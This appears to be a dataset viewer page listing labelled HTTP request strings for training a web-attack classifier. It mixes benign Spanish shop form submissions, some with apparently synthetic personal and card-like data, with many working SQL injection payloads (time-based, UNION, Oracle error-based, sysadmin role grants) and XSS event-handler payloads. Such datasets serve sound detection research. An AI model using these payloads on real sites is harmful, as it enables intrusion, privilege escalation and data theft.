stringlengths 1
| Label
int64 0
| text_label
stringclasses 3
values | ID
int64 2
modo=insertar&precio=3690&B1=Confirmar | 0 | normal | 50,788 |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- | 2 | SQLi | 19,121 |
modo=entrar&login=torrie&pwd=patatera&remember=off&B1=Entrar | 0 | normal | 40,451 |
id=3&nombre=Vino+Rioja&precio=100&cantidad=72&B1=A�adir+al+carrito | 0 | normal | 46,368 |
modo=insertar&precio=8537&B1=Confirmar | 0 | normal | 47,883 |
<table draggable="true" ondrag="alert(1)">test</table> | 1 | XSS | 6,939 |
1%' ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( '%' = ' | 2 | SQLi | 30,273 |
<br id=x tabindex=1 onactivate=alert(1)></br> | 1 | XSS | 5,354 |
id=3&nombre=Vino+Rioja&precio=85&cantidad=3&B1=A�adir+al+carrito | 0 | normal | 46,699 |
<body onerror=alert(1) onload=/> | 1 | XSS | 6,386 |
modo=insertar&precio=9813&B1=Confirmar | 0 | normal | 48,610 |
Select fail. | 0 | normal | 54,331 |
-4498 ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 2902 = 2902 | 2 | SQLi | 25,137 |
<object onkeyup="alert(1)" contenteditable>test</object> | 1 | XSS | 10,325 |
or 1=1-- | 2 | SQLi | 18,227 |
Cecilia,Chng,101 West End Avenue, New York NY 10023,717,3580817642 | 0 | normal | 53,272 |
-8633" or 5099 = 5974 | 2 | SQLi | 31,072 |
select ( case when ( 5390 = 7419 ) then 5390 else 5390* ( select 5390 from mysql.db ) end ) # | 2 | SQLi | 21,776 |
iif ( 3204 = 8489,3204,1/0 ) | 2 | SQLi | 21,792 |
iif ( 8214 = 4954,1,1/0 ) | 2 | SQLi | 23,498 |
<map draggable="true" ondragend="alert(1)">test</map> | 1 | XSS | 4,452 |
modo=registro&login=keer&password=gala&nombre=Amarili&apellidos=Misut+Fondevi&[email protected]&dni=55265136T&direccion=C/+General+Merry+Del+Val,+S/N+&ciudad=Viso+de+San+Juan,+El&cp=45674&provincia=Teruel&ntc=2996877022240469&B1=Registrar | 0 | normal | 49,535 |
( case when 5640 = 5640 then 5640 else null end ) | 2 | SQLi | 31,774 |
-1370' ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ( 'xmrg' = 'xmrg | 2 | SQLi | 24,748 |
id=2&nombre=Queso+Manchego&precio=85&cantidad=78&B1=A�adir+al+carrito | 0 | normal | 42,654 |
1' rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and 'obwn' = 'obwn | 2 | SQLi | 23,741 |
<button draggable="true" ondragend="alert(1)">test</button> | 1 | XSS | 7,111 |
<label onpointerdown=alert(1)>XSS</label> | 1 | XSS | 5,308 |
id=1&nombre=Jam�n+Ib�rico&precio=85&cantidad=91&B1=A�adir+al+carrito | 0 | normal | 37,441 |
if ( 3831 = 9321 ) select 3831 else drop function ybru-- | 2 | SQLi | 21,961 |
id=3&nombre=Jam�n+Ib�rico&precio=85&cantidad=57&B1=A�adir+al+carrito | 0 | normal | 43,432 |
<output onmouseover="alert(1)">test</output> | 1 | XSS | 9,922 |
modo=entrar&login=pepe&pwd=opulent3&remember=off&B1=Entrar | 0 | normal | 45,681 |
modo=entrar&login=rollins&pwd=cimia&remember=on&B1=Entrar | 0 | normal | 43,928 |
AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 7 ) ) AND 'i' = 'i | 2 | SQLi | 21,446 |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- | 2 | SQLi | 18,826 |
<script>throw onerror=alert,1</script> | 1 | XSS | 122 |
1 where 9752 = 9752 | 2 | SQLi | 29,353 |
Select your favorite sport. | 0 | normal | 53,929 |
1 ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( 9333 = 9333 | 2 | SQLi | 25,085 |
`'><script>\xE2\x80\x87javascript:alert(1)</script> | 1 | XSS | 18,082 |
exec sp_addsrvrolemember 'name' , 'sysadmin' | 2 | SQLi | 20,239 |
1" ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( "hmun" = "hmun | 2 | SQLi | 27,533 |
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form> | 1 | XSS | 56 |
Select modify. | 0 | normal | 54,272 |
1'+ ( select 'zkuf' where 3591 = 3591 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) +' | 2 | SQLi | 23,499 |
modo=insertar&precio=2424&B1=Pasar+por+caja | 0 | normal | 37,782 |
modo=insertar&precio=3335&B1=Confirmar | 0 | normal | 39,217 |
id=1&nombre=Jam�n+Ib�rico&precio=39&cantidad=84&B1=A�adir+al+carrito | 0 | normal | 40,258 |
<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><marquee id=x style="position:absolute;" onanimationcancel="alert(1)"></marquee> | 1 | XSS | 9,947 |
1' ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( 'seyd' = 'seyd | 2 | SQLi | 31,465 |
1' ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 'bzgs' like 'bzgs | 2 | SQLi | 27,959 |
modo=registro&login=tamer&password=el*e0toral&nombre=Floreal&apellidos=Mio+Odena&[email protected]&dni=81338514A&direccion=Avenida+Bara�ain,+51,+1?H&ciudad=Sep�lveda&cp=22587&provincia=Tarragona&ntc=7133903529620631&B1=Registrar | 0 | normal | 47,872 |
<details oncontextmenu="alert(1)">test</details> | 1 | XSS | 7,317 |
lastName=Goh&sort=address&direction=desc | 0 | normal | 52,112 |
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E | 1 | XSS | 17,892 |
modo=entrar&login=campo&pwd=0L*anQ687oL9&remember=off&B1=Entrar | 0 | normal | 48,568 |
1'+ ( select 'vfkl' where 1713 = 1713 and 8514 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) ) +' | 2 | SQLi | 25,782 |
<embed id=x tabindex=1 ondeactivate=alert(1)></embed><input id=y autofocus> | 1 | XSS | 4,904 |
id=2&nombre=Jam�n+Ib�rico&precio=85&cantidad=10&B1=A�adir+al+carrito | 0 | normal | 36,852 |
id=2&nombre=Vino+Rioja&precio=85&cantidad=56&B1=A�adir+al+carrito | 0 | normal | 41,059 |
AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i | 2 | SQLi | 20,159 |
modo=insertar&precio=3813&B1=Confirmar | 0 | normal | 34,500 |
modo=registro&login=kiele&password=t78s546n7o3&nombre=Amada&apellidos=Quint�+Olivari&[email protected]&dni=71823012S&direccion=Calle+Maria+Mallo+151+9?H&ciudad=Abertura&cp=15984&provincia=Cantabria&ntc=3429240965646914&B1=Registrar | 0 | normal | 44,561 |
modo=insertar&precio=4956&B1=Confirmar | 0 | normal | 48,694 |
id=2&nombre=Queso+Manchego&precio=39&cantidad=29&B1=A�adir+al+carrito | 0 | normal | 33,199 |
id=1&nombre=Queso+Manchego&precio=100&cantidad=33&B1=A�adir+al+carrito | 0 | normal | 42,177 |
`"'><img src=xxx:x \x09onerror=javascript:alert(1)> | 1 | XSS | 563 |
<kbd onpaste="alert(1)" contenteditable>test</kbd> | 1 | XSS | 10,468 |
<maction actiontype="statusline#" xlink:href="javascript:alert(2)">CLICKME</maction> | 1 | XSS | 14,088 |
Where's the perfect place to take a photography class? | 0 | normal | 53,622 |
select ( case when ( 6843 = 2657 ) then 6843 else 6843* ( select 6843 from information_schema.character_sets ) end ) # | 2 | SQLi | 30,994 |
modo=insertar&precio=6087&B1=Pasar+por+caja | 0 | normal | 43,446 |
modo=entrar&login=toles& | 0 | normal | 34,637 |
select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and "azzv" like "azzv | 2 | SQLi | 25,856 |
1" where 9342 = 9342 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) -- | 2 | SQLi | 30,286 |
modo=registro&login=chihung&password=97lea0&nombre=Caleb&apellidos=Moscoso+Danot&[email protected]&dni=41910864B&direccion=Plza.+Musico+Diaz+Cano+5,+&ciudad=Espronceda&cp=16144&provincia=Burgos&ntc=4646925880970082&B1=Registrar | 0 | normal | 36,738 |
-5840' ) or elt ( 1032 = 1032,3623 ) | 2 | SQLi | 30,780 |
1" or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) -- | 2 | SQLi | 25,251 |
1 or 9643 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) | 2 | SQLi | 26,860 |
1' ) where 9006 = 9006 union all select null,null,null,null,null,null-- | 2 | SQLi | 25,623 |
modo=registro&login=chaoping&password=ostR�fEra&nombre=Shar�&apellidos=R�os+Rius&[email protected]&dni=60201082P&direccion=C/+Ca�os+Del+Peral+147+&ciudad=Viana&cp=05141&provincia=Barcelona&ntc=8204676810796714&B1=Registrar | 0 | normal | 34,740 |
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337 | 2 | SQLi | 20,327 |
1'|| ( select 'qsgi' where 1707 = 1707 or 9643 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) ) ||' | 2 | SQLi | 22,201 |
modo=registro&login=hube&password=51fo53a83&nombre=Joselina&apellidos=G�llego+Hoste&[email protected]&dni=90609332G&direccion=Porta+Diego+De+Siloe,+121+11?A&ciudad=Sobrescobio&cp=01420&provincia=Toledo&ntc=6574384578961467&B1=Registrar | 0 | normal | 33,204 |
modo=registro&login=spirakis&password=corr-esponsal&nombre=Felicidad&apellidos=Oms+Berdasquera&[email protected]&dni=52431304K&direccion=Jilguero,+21+&ciudad=Inca&cp=47195&provincia=Burgos&ntc=5092770404334735&B1=Registrar | 0 | normal | 47,880 |
<keygen onpointerleave=alert(1)>XSS</keygen> | 1 | XSS | 6,544 |
Select your study. | 0 | normal | 54,652 |
1' or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) -- | 2 | SQLi | 28,644 |
modo=entrar&login=mullinix&pwd=53m7roba4le&remember=off&B1=Entrar | 0 | normal | 50,794 |
1'|| ( select 'ozki' where 4435 = 4435 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) ) ||' | 2 | SQLi | 22,440 |
Select the best candidate for the role. | 0 | normal | 53,786 |
( select * from ( select ( sleep ( 5 ) ) ) srmq ) and "wsmz" like "wsmz | 2 | SQLi | 22,350 |
modo=registro&login=staggs&password=Gorr�!N&nombre=Alidia&apellidos=Orbegoso&[email protected]&dni=59560161M&direccion=Cruz+Nueva,+S/N+5-C&ciudad=Litago&cp=22320&provincia=Huelva&ntc=2678503703599908&B1=Registrar | 0 | normal | 45,142 |
1' ) union all select null,null,null-- | 2 | SQLi | 31,426 |
id=2&nombre=Vino+Rioja&precio=85&cantidad=46&B1=A�adir+al+carrito | 0 | normal | 51,007 |
modo=insertar&precio=4567&B1=Confirmar | 0 | normal | 41,859 |
>><marquee><img src=x onerror=confirm(1)></marquee> ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script><isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //"> | 1 | XSS | 18,070 |
<script /**/>/**/alert(1)/**/</script /**/ | 1 | XSS | 1,614 |
<bdi onpointerup=alert(1)>XSS</bdi> | 1 | XSS | 7,278 |
Subsets and Splits